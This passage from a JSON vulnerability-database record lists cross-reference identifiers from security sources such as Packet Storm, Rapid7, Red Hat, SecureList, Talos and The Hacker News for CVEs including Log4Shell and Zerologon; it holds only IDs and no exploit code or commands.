"PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:164988", "PACKETSTORM:165085", "PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165563", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167261", "PACKETSTORM:167317", "PACKETSTORM:167449", "PACKETSTORM:167917", "PACKETSTORM:170178", "PACKETSTORM:170882", "PACKETSTORM:170925", "PACKETSTORM:170943", "PACKETSTORM:171626"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-3156", "PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:6636EE51C46282492E9A91509CBA5C4B", "PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446", "PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0", "PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "photon", "idList": ["PHSA-2021-0188", "PHSA-2021-0315", "PHSA-2021-0358", "PHSA-2021-1.0-0358", "PHSA-2021-2.0-0315", "PHSA-2021-3.0-0188"]}, {"type": "prion", "idList": ["PRION:CVE-2020-0688", "PRION:CVE-2021-1675", "PRION:CVE-2021-20016", "PRION:CVE-2021-20038", "PRION:CVE-2021-21972", "PRION:CVE-2021-21985", "PRION:CVE-2021-22893", "PRION:CVE-2021-26084", "PRION:CVE-2021-26412", "PRION:CVE-2021-26854", "PRION:CVE-2021-26855", "PRION:CVE-2021-26857", "PRION:CVE-2021-26858", "PRION:CVE-2021-27065", "PRION:CVE-2021-27078", "PRION:CVE-2021-27101", "PRION:CVE-2021-27102", "PRION:CVE-2021-27103", "PRION:CVE-2021-27104", "PRION:CVE-2021-27852", "PRION:CVE-2021-3100", "PRION:CVE-2021-31196", "PRION:CVE-2021-31206", "PRION:CVE-2021-31207", "PRION:CVE-2021-3156", "PRION:CVE-2021-33768", "PRION:CVE-2021-34470", "PRION:CVE-2021-34473", "PRION:CVE-2021-34523", "PRION:CVE-2021-34527", "PRION:CVE-2021-35464", "PRION:CVE-2021-40444", "PRION:CVE-2021-40539", "PRION:CVE-2021-4104", "PRION:CVE-2021-4125", "PRION:CVE-2021-42237", "PRION:CVE-2021-44228", "PRION:CVE-2021-44530", "PRION:CVE-2021-45046", "PRION:CVE-2022-0070", "PRION:CVE-2022-23848", "PRION:CVE-2022-33915", "PRION:CVE-2022-42475", "PRION:CVE-2022-47966"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:5F3A665821FA30373004EC52F5104E15", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8A2B26102098E31C5F8E392A55929F58", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A341C9278C6DD389E0F263AE83CB5579", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:E9408B9A1592F0FED621B417D14ABECD", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:000305BC832103845A712987C0E849E4", "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:05A653A5E863B78EDD56FD74F059E02E", "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:3801C6C4728415BDC9A56A2258BD827B", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:3E54ECACB70B1C9E4DF1458D3CABE899", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:46A54401F6ED43B72F664A32EA043CB8", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "RAPID7BLOG:651F7B992ADD894F63962C1BB45887A6", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6B7627C66695872037AEC3E9AC981C49", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:896942D0CDF4701FAF0531A15C44DA19", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:B7BFF90DF2218C3CFB5ABB1CFE63700E", "RAPID7BLOG:BCCD03F6B72FD7F9410FC063D6F16682", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CA6D1E560679DBBB9F7A5EECC34A0194", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CBB459355DA52AAEA21DDFD10D5B6FDB", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D1061BEC8F38C05C82730335576C86AF", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1C9D661B6FC47BE44B8FBB6E1D49AD5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F8E947B78D57CB73762E22B0E79A628C", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:0218", "RHSA-2021:0219", "RHSA-2021:0220", "RHSA-2021:0221", "RHSA-2021:0222", "RHSA-2021:0223", "RHSA-2021:0224", "RHSA-2021:0225", "RHSA-2021:0226", "RHSA-2021:0227", "RHSA-2021:0395", "RHSA-2021:0401", "RHSA-2021:0799", "RHSA-2021:1079", "RHSA-2021:1647", "RHSA-2021:3723", "RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472", "RH:CVE-2021-3156", "RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105", "RH:CVE-2022-47966"]}, {"type": "rocky", "idList": ["RLSA-2021:1647"]}, {"type": "rosalinux", "idList": ["ROSA-SA-2021-1967"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:25A1AE710DDC7BDF13922068FD6E1AB1", "SAINT:27C5127555C4E549C099885D4DCD41D9", "SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE", "SAINT:DB6048DE08200736030664D3F0E6C764"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472", "SAMBA:CVE-2022-38023"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:63AD9BC433286AAD504D73797903AF90", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:6C418779587ADE032AB673F44440002B", "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:7F5AA1EA9018F295D1D8A9882EA0F724", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:9E653409B4D8C46D45939FA37442E456", "SECURELIST:9E89F9F48CFED14FAC92E1E9861C2576", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A71E207678429F2F49013A82A5A5EED4", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D3F258CC3CAC108A409150AE598738D9", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "SECURELIST:F05591B26EFD622E6C72E180A7A47154", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "SECURELIST:F62AEEAB0355FAC92D225F808BBF00CD", "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:96484", "SSV:97206", "SSV:99260", "SSV:99276", "SSV:99284"]}, {"type": "slackware", "idList": ["SSA-2021-026-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1", "OPENSUSE-SU-2021:0169-1", "OPENSUSE-SU-2021:0170-1", "OPENSUSE-SU-2021:0602-1", "OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-111238", "SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:224F6FF67DED69B2FFFA483B3490BCE0", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:3ED0A7241D26DA2E055F95E6C0B4328B", "TALOSBLOG:422E9F3F2D27B5C62D821C614EBE60A6", "TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B", "TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:81D132DB83595095EFF3C84BE6E761F5", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:A841859916AA26CF6EF3F3F403502778", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB", "TALOSBLOG:CC380ECFE738DDDFB3125AC0B32484C7", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:CF2344D3946410B628ACF0DE5E525347", "TALOSBLOG:D6DE736915C69A194D894AE9BED7EC57", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:E19A22F37E2F320BDD9B4727A5209175", "TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6", "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:161777F5DB73EF3AB5B13EF9F11E3374", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1AC8C94468BC3582621B1E56C40127CD", "THN:1AFD9B38CF83CBCCF34CEA589CD5838B", "THN:1B5512B7CB75F82A34395AC39A9B2680", "THN:1B78DDF8BAADEE9CFC252FF9708EE0A6", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:23ADB89A5DA622FFE2242173C6438C19", "THN:25143CA85A0297381CEBBBD35F24F85B", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2722097C084561C0EE24E84FA6AD506E", "THN:281560A81151A934501A27157417DD37", "THN:2AE638B06506778A5F779054ACB99CDC", "THN:2C8CBCD861548E196121A3935B9E6F83", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3347044068F87AF8B4B5B834EC20FE3F", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:362401076AC227D49D729838DBDC2052", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:3B0CBDDCB6FCC241176B94BC03E008BA", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:40A0D7C4B23FCEF48FD7EDCF1CC389AD", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:43A16BBDCD3B020E360EE37C48B44088", "THN:44A32C71995BCA06A2F946B41E81310C", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4BB0F5033E84CFC573DF9D7BB5DB4780", "THN:4D48A331D9707E239D1C89EE592EE4D3", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "THN:52153F8855D24E20FDD2CC03040B1EF1", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:582576397E2C98200C7C952401392B5B", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:603F844B99A1CC0CF1DE580659626B57", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:63560DA43FB5804E3B258BC62E210EC4", "THN:6428957E9DED493169A2E63839F98667", "THN:6510A3250EDBD304F93AA770592A8D14", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6A1A5F396F8A43A1DA67A07FF545680A", "THN:6C2DBDCB2BCAD28AA5B80EFC1EF9CDBF", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:76F500CE84314456F7B0E4DD1D56D971", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:81F8A577F12DD54CE019C36458B14B52", "THN:8206540196B8702ACC0E342FE035E526", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:8755093D287CCB8F16A1A7CD3BDB6ACF", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8A48502265B6BF239E81FC688A0FF082", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:91D830EBDC372E772FBEC3C61F17F028", "THN:933FE23273AB5250B949633A337D44E1", "THN:942BFBB34DF6A24E460572684F648005", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:97FD375C23B4E7C3F13B9F3907873671", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9B536B531E6948881A29BEC793495D1E", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:9DC026B1716712BE0EF2205D941A4D67", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A2139F34F5915952064FC587D775913E", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:A5E2056B783A702B2A37C7ECD02B811F", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", 